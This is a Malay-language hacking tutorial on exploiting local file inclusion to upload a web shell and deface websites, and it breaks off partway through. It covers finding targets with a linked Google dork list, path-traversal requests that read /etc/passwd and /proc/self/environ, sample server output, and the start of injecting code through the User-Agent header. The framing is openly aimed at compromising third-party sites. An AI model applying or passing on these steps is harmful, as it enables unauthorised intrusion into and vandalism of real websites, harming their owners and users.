UPLOAD SHELL DAN DEFACE DENGAN LFI

Assalamualaikum dan salam sejahtera.Hari ini aku nak buat tuto cara nak upload shell dan deface website dengan LFI atau nama penuhnya Local File Inclusion.
Ok jom mula..

1. Mula-mula cari website target.Dork boleh dapatkan di :
http://pastebin.com/rKWHFHVT

2. Lepas dah dapat web target kita kena test pulak.
Katakan lah url web tu macam ni :

http://www.website.com/view.php?page=contact.php

untuk test vuln ke tak, kita buat macam ni :

http://www.website.com/view.php?page=../

tambah ../ kat hujung tu.Kalau vuln, kita akan dapat error :

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/reaperz/public_html/website.com/view.php on line 1337

Kemungkinan besar web tu vuln LFI.Jom kita test lagi.
Kali ni kita nak cari etc/passwd pulak.
buat macam ni :

http://www.website.com/view.php?page=../etc/passwd

Kita dapat error lagi dan tak ada etc/passwd
Jadi kita naik lagi directory lain.cara nya tambah ../ kat depan

http://www.website.com/view.php?page=../../../etc/passwd

Tambah ../ sampai jumpa etc/passwd
Kalau berjaya kita akan dapat macam ni :

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

Yes! tu maksudnya web tu vulnerable kepada LFI.

3. Sekarang masa untuk tengok samaada directory proc/self/environ dapat diakses atau tidak.

Caranya gantikan etc/passwd tadi dengan proc/self/environ .
Contoh :

http://www.website.com/view.php?page=../../../proc/self/environ

Kalau boleh diakses korang akan dapat error macam ni :

DOCUMENT_ROOT=/home/reaperz/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

Kalau keluar kosong ja, tak ada tulis macam ni, maksudnya direktory proc/self/environ tak dapat diakses ataupun OS yang digunakan ialah FreeBSD.

4. Sekarang masanya untuk kita inject shell kedalam proc/self/environ. Caranya ialah dengan inject code kita melalui User-Agent HTTP Header.

Kita boleh guna add-on Tamper Data yang boleh didapati dalam Mozilla Firefox untuk inject code kita.

Buka Tamper Data dalam firefox (alt+T > Tamper Data).Kemudian click Start Tamper.